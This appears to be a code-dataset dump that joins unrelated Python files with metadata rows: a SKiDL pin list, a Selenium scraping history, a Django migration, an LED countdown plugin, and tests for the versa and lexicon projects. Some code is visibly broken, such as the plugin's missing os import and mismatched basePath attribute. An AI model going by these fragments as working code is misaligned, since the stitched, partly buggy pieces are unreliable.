Pin(num='35',name='G3',func=Pin.PASSIVE,do_erc=True),
Pin(num='45',name='D5',func=Pin.PASSIVE,do_erc=True),
Pin(num='55',name='C11',func=Pin.PASSIVE,do_erc=True),
Pin(num='65',name='A12',func=Pin.PASSIVE,do_erc=True),
Pin(num='75',name='B0',func=Pin.PASSIVE,do_erc=True),
Pin(num='85',name='B12',func=Pin.PASSIVE,do_erc=True),
Pin(num='95',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='H2',func=Pin.PASSIVE,do_erc=True),
Pin(num='26',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='G2',func=Pin.PASSIVE,do_erc=True),
Pin(num='46',name='D6',func=Pin.PASSIVE,do_erc=True),
Pin(num='56',name='C10',func=Pin.PASSIVE,do_erc=True),
Pin(num='66',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='76',name='B1',func=Pin.PASSIVE,do_erc=True),
Pin(num='86',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='96',name='E6',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='H3',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='G13',func=Pin.PASSIVE,do_erc=True),
Pin(num='37',name='G1',func=Pin.PASSIVE,do_erc=True),
Pin(num='47',name='D10',func=Pin.PASSIVE,do_erc=True),
Pin(num='57',name='C6',func=Pin.PASSIVE,do_erc=True),
Pin(num='67',name='A10',func=Pin.PASSIVE,do_erc=True),
Pin(num='77',name='B2',func=Pin.PASSIVE,do_erc=True),
Pin(num='87',name='CLK3/IN3',do_erc=True),
Pin(num='97',name='E5',func=Pin.PASSIVE,do_erc=True),
Pin(num='18',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='G12',func=Pin.PASSIVE,do_erc=True),
Pin(num='38',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='D11',func=Pin.PASSIVE,do_erc=True),
Pin(num='58',name='C5',func=Pin.PASSIVE,do_erc=True),
Pin(num='68',name='A6',func=Pin.PASSIVE,do_erc=True),
Pin(num='78',name='B3',func=Pin.PASSIVE,do_erc=True),
Pin(num='88',name='CLK2/IN2',do_erc=True),
Pin(num='98',name='E4',func=Pin.PASSIVE,do_erc=True),
Pin(num='19',name='H5',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='G11',func=Pin.PASSIVE,do_erc=True),
Pin(num='39',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='49',name='D12',func=Pin.PASSIVE,do_erc=True),
Pin(num='59',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='69',name='A5',func=Pin.PASSIVE,do_erc=True),
Pin(num='79',name='B4',func=Pin.PASSIVE,do_erc=True),
Pin(num='89',name='CLK1/IN1',do_erc=True),
Pin(num='99',name='E3',func=Pin.PASSIVE,do_erc=True),
Pin(num='100',name='E2',func=Pin.PASSIVE,do_erc=True)]),
Part(name='XCR3256-TQ144',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XCV150_BG352',dest=TEMPLATE,tool=SKIDL,do_erc=True)])
| 68.086795 | 212 | 0.589387 | 30,972 | 183,562 | 3.36604 | 0.049077 | 0.129013 | 0.232224 | 0.301689 | 0.936692 | 0.935321 | 0.933191 | 0.913988 | 0.889375 | 0.820964 | 0 | 0.07137 | 0.189663 | 183,562 | 2,695 | 213 | 68.112059 | 0.629505 | 0 | 0 | 0.435202 | 0 | 0 | 0.121888 | 0.004004 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.117341 | 0.000371 | 0 | 0.000371 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
b5bd46d81a6f8301d342f9ea1e13215e7fcaffb5 | 1,875 | py | Python | tot_history/tot_history/hist.py | atomse/trace-of-tears | 79c76a341e92508dde77b705fa7039fa0cfbe4e8 | [
"Unlicense"
] | null | null | null | tot_history/tot_history/hist.py | atomse/trace-of-tears | 79c76a341e92508dde77b705fa7039fa0cfbe4e8 | [
"Unlicense"
] | null | null | null | tot_history/tot_history/hist.py | atomse/trace-of-tears | 79c76a341e92508dde77b705fa7039fa0cfbe4e8 | [
"Unlicense"
] | null | null | null | browser.get('http://www.tianya.cn/12310752/bbs?t=post')
browser.find_element_by_class_name('closeBtn').click()
browser.find_elements_by_xpath('//td[@class="p-title"]')
browser.find_elements_by_xpath('//td[@class="p-title"]/@href').extract()
browser.find_elements_by_xpath('//td[@class="p-title"]/@href')
browser.find_elements_by_xpath('//td[@class="p-title"]/a/@href')
browser.find_elements_by_xpath('//td[@class="p-title"]/a')
browser.find_elements_by_xpath('//td[@class="p-title"]/a')[0].get('href'
)
x = browser.find_elements_by_xpath('//td[@class="p-title"]/a')[0]
x.get_attribute('href')
post_lists = []
post_lists = set()
post_set = set()
browser.find_elements_by_xpath('//td[@class="p-title"]/a')
[post_set.add(href) for href in browser.find_elements_by_xpath('//td[@class="p-title"]/a').get_attribute('href')]
[post_set.add(href.get_attribute('href')) for href in browser.find_elements_by_xpath('//td[@class="p-title"]/a')]
post_set
for href in browser.find_elements_by_xpath('//td[@class="p-title"]/a'):
print(href)
href.text
href.get_property
href.get_property()
href.__dict__
post_set = set()
for href in browser.find_elements_by_xpath('//div[@id="post"]//td[@class="p-title"]/a'):
post_set.add(href.get_attribute('href'))
post_set
post_set = set()
while True:
for href in browser.find_elements_by_xpath('//div[@id="post"]//td[@class="p-title"]/a'):
post_set.add(href.get_attribute('href'))
try:
browser.find_element_by_link_text('下一页').click()
except:
break
_set
post_set
while True:
for href in browser.find_elements_by_xpath('//div[@id="post"]//td[@class="p-title"]/a'):
post_set.add(href.get_attribute('href'))
try:
browser.find_element_by_link_text('下一页').click()
except:
break
with open('tot_urls.txt', 'w') as fd:
[print(url, file=fd) for url in post_set]
%hist -f hist.py
| 38.265306 | 113 | 0.698667 | 310 | 1,875 | 3.96129 | 0.190323 | 0.15228 | 0.216612 | 0.239414 | 0.767915 | 0.749186 | 0.749186 | 0.728013 | 0.728013 | 0.691368 | 0 | 0.005889 | 0.0944 | 1,875 | 48 | 114 | 39.0625 | 0.717314 | 0 | 0 | 0.5 | 0 | 0 | 0.263467 | 0.2128 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.041667 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b5f75640a4a22d92d879893a22e454084c457671 | 3,089 | py | Python | web/migrations/0001_initial.py | weerapatbook/studentmonitor | 82d3f5f3ce123b447ba4e4930765319734eab223 | [
"Apache-2.0"
] | null | null | null | web/migrations/0001_initial.py | weerapatbook/studentmonitor | 82d3f5f3ce123b447ba4e4930765319734eab223 | [
"Apache-2.0"
] | 4 | 2020-02-12T00:58:14.000Z | 2021-06-10T21:43:33.000Z | web/migrations/0001_initial.py | weerapatbook/studentmonitor | 82d3f5f3ce123b447ba4e4930765319734eab223 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.7 on 2019-02-16 15:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Absent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=200, null=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Room',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=200, null=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(blank=True, max_length=200, null=True)),
('last_name', models.CharField(blank=True, max_length=200, null=True)),
('code', models.CharField(blank=True, max_length=200, null=True)),
('sex', models.CharField(blank=True, choices=[('1', 'male'), ('2', 'fremale')], max_length=1, null=True)),
],
),
migrations.CreateModel(
name='StudentInRoom',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_year', models.IntegerField(blank=True, default=2561, null=True)),
('room', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='web.Room')),
('student', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='web.Student')),
],
),
migrations.CreateModel(
name='Subject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=200, null=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=200, null=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('telephone', models.CharField(blank=True, max_length=200, null=True)),
],
),
]
| 45.426471 | 133 | 0.575591 | 326 | 3,089 | 5.343558 | 0.205521 | 0.082664 | 0.149254 | 0.179104 | 0.762342 | 0.743398 | 0.743398 | 0.743398 | 0.743398 | 0.692882 | 0 | 0.025881 | 0.274523 | 3,089 | 67 | 134 | 46.104478 | 0.75145 | 0.014568 | 0 | 0.633333 | 1 | 0 | 0.071663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd0e5788d0c6de07b321c923c48dd1b2c6d0500a | 116 | py | Python | src/rdiff_trimmer/__init__.py | Bystroushaak/rsync_trimmer | 76c7712c2a17f65b9ea78cedceb23dd7b813cac9 | [
"MIT"
] | null | null | null | src/rdiff_trimmer/__init__.py | Bystroushaak/rsync_trimmer | 76c7712c2a17f65b9ea78cedceb23dd7b813cac9 | [
"MIT"
] | 3 | 2018-05-13T10:07:46.000Z | 2020-09-26T08:02:53.000Z | src/rdiff_trimmer/__init__.py | Bystroushaak/rsync_trimmer | 76c7712c2a17f65b9ea78cedceb23dd7b813cac9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .trimmer import main
from .rdiff_api import RdiffAPI
from .rdiff_api import Increment
| 19.333333 | 32 | 0.741379 | 17 | 116 | 4.941176 | 0.647059 | 0.214286 | 0.285714 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 0.155172 | 116 | 5 | 33 | 23.2 | 0.846939 | 0.181034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
bd2b7565782558e2474036fcaf862258dd12b052 | 9,269 | py | Python | pythonModules/plugin_showCountDown.py | mhoelzner/BinaryClock_RP | 3dcd6c9369b827c4228c90c8c4da6dd9c21ab632 | [
"MIT"
] | null | null | null | pythonModules/plugin_showCountDown.py | mhoelzner/BinaryClock_RP | 3dcd6c9369b827c4228c90c8c4da6dd9c21ab632 | [
"MIT"
] | null | null | null | pythonModules/plugin_showCountDown.py | mhoelzner/BinaryClock_RP | 3dcd6c9369b827c4228c90c8c4da6dd9c21ab632 | [
"MIT"
] | null | null | null | import time
import binaryClockLEDFunctions as bcl
from neopixel import Color
import fontdemo
class ShowCountDown():
def __init__(self, strip, c_width, c_height, basepath):
self.strip = strip
self.clock_width = c_width
self.clock_height = c_height
self.stripFunctions = bcl.LEDFunctions(self.strip,
self.clock_width,
self.clock_height)
self.basepath = basepath
def showCountDown(self):
'''
0 1 2 3 4 5 ->--
|
--<- 11 10 9 8 7 6 -<--
|
-->- 12 13 14 15 16 17 ->--
|
23 22 21 20 19 18 -<--
'''
# Erase previous content
self.stripFunctions.wipeLEDs()
colors = [Color(255,0,0),
Color(255,96,0),
Color(255,255,0),
Color(128,255,0),
Color(0,255,0),
Color(0,255,128),
Color(0,255,255),
Color(0,178,255),
Color(0,0,255),
Color(128,0,255),
Color(255,0,255)]
for i in range(10):
if i == 0:
# 10
self.stripFunctions.setColorBy1DCoordinate(11,colors[i])
self.stripFunctions.setColorBy1DCoordinate(23,colors[i])
self.stripFunctions.setColorBy1DCoordinate(1,colors[i])
self.stripFunctions.setColorBy1DCoordinate(10,colors[i])
self.stripFunctions.setColorBy1DCoordinate(13,colors[i])
self.stripFunctions.setColorBy1DCoordinate(22,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(4,colors[i])
self.stripFunctions.setColorBy1DCoordinate(8,colors[i])
self.stripFunctions.setColorBy1DCoordinate(15,colors[i])
self.stripFunctions.setColorBy1DCoordinate(19,colors[i])
self.stripFunctions.setColorBy1DCoordinate(17,colors[i])
self.stripFunctions.setColorBy1DCoordinate(6,colors[i])
elif i == 1:
# 9
self.stripFunctions.setColorBy1DCoordinate(9,colors[i])
self.stripFunctions.setColorBy1DCoordinate(14,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(15,colors[i])
self.stripFunctions.setColorBy1DCoordinate(4,colors[i])
self.stripFunctions.setColorBy1DCoordinate(7,colors[i])
self.stripFunctions.setColorBy1DCoordinate(16,colors[i])
self.stripFunctions.setColorBy1DCoordinate(19,colors[i])
elif i == 2:
# 8
self.stripFunctions.setColorBy1DCoordinate(1,colors[i])
self.stripFunctions.setColorBy1DCoordinate(10,colors[i])
self.stripFunctions.setColorBy1DCoordinate(13,colors[i])
self.stripFunctions.setColorBy1DCoordinate(2,colors[i])
self.stripFunctions.setColorBy1DCoordinate(14,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(8,colors[i])
self.stripFunctions.setColorBy1DCoordinate(20,colors[i])
self.stripFunctions.setColorBy1DCoordinate(7,colors[i])
self.stripFunctions.setColorBy1DCoordinate(16,colors[i])
self.stripFunctions.setColorBy1DCoordinate(19,colors[i])
elif i == 3:
# 7
self.stripFunctions.setColorBy1DCoordinate(2,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(15,colors[i])
self.stripFunctions.setColorBy1DCoordinate(4,colors[i])
self.stripFunctions.setColorBy1DCoordinate(7,colors[i])
elif i == 4:
# 6
self.stripFunctions.setColorBy1DCoordinate(9,colors[i])
self.stripFunctions.setColorBy1DCoordinate(14,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(2,colors[i])
self.stripFunctions.setColorBy1DCoordinate(15,colors[i])
self.stripFunctions.setColorBy1DCoordinate(20,colors[i])
self.stripFunctions.setColorBy1DCoordinate(6,colors[i])
self.stripFunctions.setColorBy1DCoordinate(16,colors[i])
self.stripFunctions.setColorBy1DCoordinate(19,colors[i])
elif i == 5:
# 5
self.stripFunctions.setColorBy1DCoordinate(2,colors[i])
self.stripFunctions.setColorBy1DCoordinate(9,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(20,colors[i])
self.stripFunctions.setColorBy1DCoordinate(4,colors[i])
self.stripFunctions.setColorBy1DCoordinate(16,colors[i])
elif i == 6:
# 4
self.stripFunctions.setColorBy1DCoordinate(9,colors[i])
self.stripFunctions.setColorBy1DCoordinate(14,colors[i])
self.stripFunctions.setColorBy1DCoordinate(15,colors[i])
self.stripFunctions.setColorBy1DCoordinate(4,colors[i])
self.stripFunctions.setColorBy1DCoordinate(7,colors[i])
self.stripFunctions.setColorBy1DCoordinate(16,colors[i])
self.stripFunctions.setColorBy1DCoordinate(19,colors[i])
elif i == 7:
# 3
self.stripFunctions.setColorBy1DCoordinate(2,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(8,colors[i])
self.stripFunctions.setColorBy1DCoordinate(20,colors[i])
self.stripFunctions.setColorBy1DCoordinate(7,colors[i])
self.stripFunctions.setColorBy1DCoordinate(16,colors[i])
elif i == 8:
# 2
self.stripFunctions.setColorBy1DCoordinate(2,colors[i])
self.stripFunctions.setColorBy1DCoordinate(14,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.stripFunctions.setColorBy1DCoordinate(3,colors[i])
self.stripFunctions.setColorBy1DCoordinate(20,colors[i])
self.stripFunctions.setColorBy1DCoordinate(7,colors[i])
self.stripFunctions.setColorBy1DCoordinate(19,colors[i])
elif i == 9:
# 1
self.stripFunctions.setColorBy1DCoordinate(11,colors[i])
self.stripFunctions.setColorBy1DCoordinate(23,colors[i])
self.stripFunctions.setColorBy1DCoordinate(1,colors[i])
self.stripFunctions.setColorBy1DCoordinate(10,colors[i])
self.stripFunctions.setColorBy1DCoordinate(13,colors[i])
self.stripFunctions.setColorBy1DCoordinate(22,colors[i])
self.stripFunctions.setColorBy1DCoordinate(21,colors[i])
self.strip.show()
time.sleep(1)
self.stripFunctions.wipeLEDs()
text = 'Frohes Neues'
fg_color = colors[10]
bg_color = Color(0,0,0)
fps = 5
count = 1
# set font
font = os.path.join(self.basePath, 'other', 'tiny.ttf')
# setup fontdemo
fnt = fontdemo.Font(font, self.clock_width)
txt_width, txt_height, txt_max_descent = fnt.text_dimensions(text)
txt_as_pixel = fnt.render_text(text)
# Display text count times
for i in range(count):
# Erase previous content
self.stripFunctions.wipeLEDs(bg_color)
# Shift text from left to right to show all.
for cur_offset in range(txt_width - self.clock_width + 1):
for y in range(txt_height):
for x in range(self.clock_width):
if txt_as_pixel.pixels[y * txt_width + x + cur_offset]:
u_color = fg_color
else:
u_color = bg_color
self.stripFunctions.setColorBy2DCoordinates(x,
y,
u_color)
self.strip.show()
time.sleep(1.0/fps)
| 43.111628 | 79 | 0.576545 | 827 | 9,269 | 6.415961 | 0.123337 | 0.301922 | 0.633245 | 0.348662 | 0.805503 | 0.79363 | 0.768375 | 0.768375 | 0.756125 | 0.739352 | 0 | 0.057857 | 0.330564 | 9,269 | 214 | 80 | 43.313084 | 0.79726 | 0.038839 | 0 | 0.591837 | 0 | 0 | 0.002841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013605 | false | 0 | 0.027211 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
bd4d205de75e249448d35aa93d1fb79c43634dfc | 99 | py | Python | lang/helpers/filesystem/__init__.py | NinjasCL-labs/masonite-i18n | 7b4c0203073e7603a95d415af71880d6fadc3d9c | [
"MIT"
] | 2 | 2021-02-25T11:26:23.000Z | 2021-03-18T18:27:53.000Z | lang/helpers/filesystem/__init__.py | NinjasCL-labs/masonite-i18n | 7b4c0203073e7603a95d415af71880d6fadc3d9c | [
"MIT"
] | 3 | 2018-08-15T19:19:19.000Z | 2018-09-09T03:47:14.000Z | lang/helpers/filesystem/__init__.py | clsource/masonite-i18n | 7b4c0203073e7603a95d415af71880d6fadc3d9c | [
"MIT"
] | 2 | 2021-02-25T11:26:23.000Z | 2021-12-27T00:35:43.000Z | # coding: utf-8
from . import load # noqa, flake8 issue
from . import paths # noqa, flake8 issue
| 24.75 | 41 | 0.69697 | 15 | 99 | 4.6 | 0.666667 | 0.289855 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.212121 | 99 | 3 | 42 | 33 | 0.846154 | 0.515152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
95020514f1c7718c3454c004eee13ad33dcba4d3 | 3,573 | py | Python | test/py/test_miniquery.py | zepheira/versa | a33558c8bcff11eed0ef212fe9ec7e3d97047732 | [
"Apache-2.0"
] | 7 | 2015-03-12T19:13:34.000Z | 2021-07-31T10:10:46.000Z | test/py/test_miniquery.py | zepheira/versa | a33558c8bcff11eed0ef212fe9ec7e3d97047732 | [
"Apache-2.0"
] | 14 | 2019-04-18T16:26:55.000Z | 2022-03-31T16:58:46.000Z | test/py/test_miniquery.py | zepheira/versa | a33558c8bcff11eed0ef212fe9ec7e3d97047732 | [
"Apache-2.0"
] | 2 | 2015-11-09T04:14:10.000Z | 2019-07-24T06:03:36.000Z | '''
'''
import logging
from versa.query import miniparse, context
from versa.driver import memory
def test_basics():
"Basic query test"
m = memory.connection()
[ m.add(*l) for l in RELS_1 ]
variables = {'DC': DC, 'H5': H5, 'H5L': H5L}
ctx = context(tuple(RELS_1[0]), m, U + 'uo', base=None, extras=None, variables=variables)
parsed = miniparse("?($a, H5 'title', *) and ?($b, H5L 'see-also', $a)")
result = parsed.evaluate(ctx)
assert result == {'a': set(['http://uche.ogbuji.net/ndewo/']), 'b': set(['http://uche.ogbuji.net/'])}
parsed = miniparse("?($a, H5L 'see-also', *)")
result = parsed.evaluate(ctx)
assert result == {'a': set(['http://uche.ogbuji.net/', 'http://uche.ogbuji.net/ndewo/'])}
parsed = miniparse("?($a, H5 'title', *)")
result = parsed.evaluate(ctx)
assert result == {'a': set(['http://uche.ogbuji.net/ndewo/'])}
return
DC = 'http://purl.org/dc/elements/1.1/'
H5 = 'http://www.w3.org/TR/html5/'
H5L = 'http://www.w3.org/TR/html5/link-type/'
U = 'http://uche.ogbuji.net#'
RELS_1 = [
("http://uche.ogbuji.net/ndewo/", "http://www.w3.org/TR/html5/title", "Ndewo, Colorado", {"@lang": "en"}),
("http://uche.ogbuji.net/ndewo/", "http://www.w3.org/TR/html5/link-type/author", "http://uche.ogbuji.net/", {"link/description": "Uche Ogbuji"}),
("http://uche.ogbuji.net/ndewo/", "http://www.w3.org/TR/html5/link-type/see-also", "https://www.goodreads.com/book/show/18714145-ndewo-colorado", {"@label": "Goodreads"}),
("http://uche.ogbuji.net/", "http://www.w3.org/TR/html5/link-type/see-also", "http://uche.ogbuji.net/ndewo/", {})
]
RELS_2 = [
("http://copia.ogbuji.net", "http://purl.org/dc/elements/1.1/creator", "Uche Ogbuji", {"@context": "http://copia.ogbuji.net#_metadata"}),
("http://copia.ogbuji.net", "http://purl.org/dc/elements/1.1/title", "Copia", {"@context": "http://copia.ogbuji.net#_metadata", '@lang': 'en'}),
("http://uche.ogbuji.net", "http://purl.org/dc/elements/1.1/creator", "Uche Ogbuji", {"@context": "http://uche.ogbuji.net#_metadata"}),
("http://uche.ogbuji.net", "http://purl.org/dc/elements/1.1/title", "Uche's home", {"@context": "http://uche.ogbuji.net#_metadata", '@lang': 'en'}),
("http://uche.ogbuji.net", "http://purl.org/dc/elements/1.1/title", "Ulo Uche", {"@context": "http://uche.ogbuji.net#_metadata", '@lang': 'ig'}),
]
if __name__ == '__main__':
raise SystemExit("use py.test")
'''
from versa.query import miniparse, context
from versa.driver import memory
DC = 'http://purl.org/dc/elements/1.1/'
H5 = 'http://www.w3.org/TR/html5/'
H5L = 'http://www.w3.org/TR/html5/link-type/'
U = 'http://uche.ogbuji.net#'
m = memory.connection()
LINKS = [
["http://uche.ogbuji.net/ndewo/", "http://www.w3.org/TR/html5/title", "Ndewo, Colorado", {"@lang": "en"}],
["http://uche.ogbuji.net/ndewo/", "http://www.w3.org/TR/html5/link-type/author", "http://uche.ogbuji.net/", {"link/description": "Uche Ogbuji"}],
["http://uche.ogbuji.net/ndewo/", "http://www.w3.org/TR/html5/link-type/see-also", "https://www.goodreads.com/book/show/18714145-ndewo-colorado", {"@label": "Goodreads"}],
["http://uche.ogbuji.net/", "http://www.w3.org/TR/html5/link-type/see-also", "http://uche.ogbuji.net/ndewo/", {}]
]
[ m.add(*l) for l in LINKS ]
variables = {'DC': DC, 'H5': H5, 'H5L': H5L}
ctx = context(tuple(LINKS[0]), m, U + 'uo', base=None, extras=None, variables=variables)
parsed = miniparse("?($a, H5 'title', *) and ?($b, H5L 'see-also', $a)")
parsed.evaluate(ctx)
parsed = miniparse("?($a, H5 'title', *)")
parsed.evaluate(ctx)
'''
| 46.402597 | 175 | 0.622446 | 531 | 3,573 | 4.154426 | 0.163842 | 0.13146 | 0.158658 | 0.192656 | 0.894379 | 0.854488 | 0.81777 | 0.794651 | 0.794651 | 0.794651 | 0 | 0.024812 | 0.108872 | 3,573 | 76 | 176 | 47.013158 | 0.668028 | 0.004478 | 0 | 0.078947 | 0 | 0.026316 | 0.580698 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 1 | 0.026316 | false | 0 | 0.078947 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1f7961a99a89629ef94e7fc3af1477fa6d1c7ec5 | 129 | py | Python | leg/software/leg_control_software/pareto_leg/__init__.py | sburden-group/pareto_leg_hardware | 39283d67be67bed464580db8b2487edd33c30100 | [
"MIT"
] | null | null | null | leg/software/leg_control_software/pareto_leg/__init__.py | sburden-group/pareto_leg_hardware | 39283d67be67bed464580db8b2487edd33c30100 | [
"MIT"
] | 5 | 2022-02-18T22:49:26.000Z | 2022-03-11T22:09:42.000Z | leg/software/leg_control_software/pareto_leg/__init__.py | sburden-group/pareto_leg_hardware | 39283d67be67bed464580db8b2487edd33c30100 | [
"MIT"
] | null | null | null | from .pareto_leg import ParetoLeg # to avoid from pareto_leg.pareto_leg import ParetoLeg
from .odrive_driver import OdriveDriver
| 43 | 88 | 0.852713 | 19 | 129 | 5.578947 | 0.526316 | 0.254717 | 0.245283 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 129 | 2 | 89 | 64.5 | 0.929825 | 0.403101 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
2f20e026f980293b5832b04201b38f37387014bc | 9,197 | py | Python | lexicon/tests/providers/test_hosteurope.py | tlusser-inv/lexicon | 700d9912fb4628414dae1f7b9783837eb8d796e0 | [
"MIT"
] | null | null | null | lexicon/tests/providers/test_hosteurope.py | tlusser-inv/lexicon | 700d9912fb4628414dae1f7b9783837eb8d796e0 | [
"MIT"
] | null | null | null | lexicon/tests/providers/test_hosteurope.py | tlusser-inv/lexicon | 700d9912fb4628414dae1f7b9783837eb8d796e0 | [
"MIT"
] | null | null | null | # Test for one implementation of the interface
from unittest import TestCase
import pytest
from lexicon.tests.providers.integration_tests import IntegrationTests, _vcr_integration_test
# Hook into testing framework by inheriting unittest.TestCase and reuse
# the tests which *each and every* implementation of the interface must
# pass, by inheritance from integration_tests.IntegrationTests
class HosteuropeProviderTests(TestCase, IntegrationTests):
"""Integration tests for Hosteurope provider"""
provider_name = 'hosteurope'
domain = 'invenium.io'
def _filter_post_data_parameters(self):
return ['brandId', 'identifier', 'password', 'recaptcha']
def _filter_headers(self):
return ['cookie', ':path:']
def _filter_query_parameters(self):
return ['brandId', 'identifier', 'password', 'recaptcha']
def _filter_response(self, response):
"""See `IntegrationTests._filter_response` for more information on how
to filter the provider response."""
if response['headers'].get('set-cookie', None) is not None:
del response['headers']['set-cookie']
return response
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_authenticate(self):
super(HosteuropeProviderTests, self).test_provider_authenticate()
@_vcr_integration_test
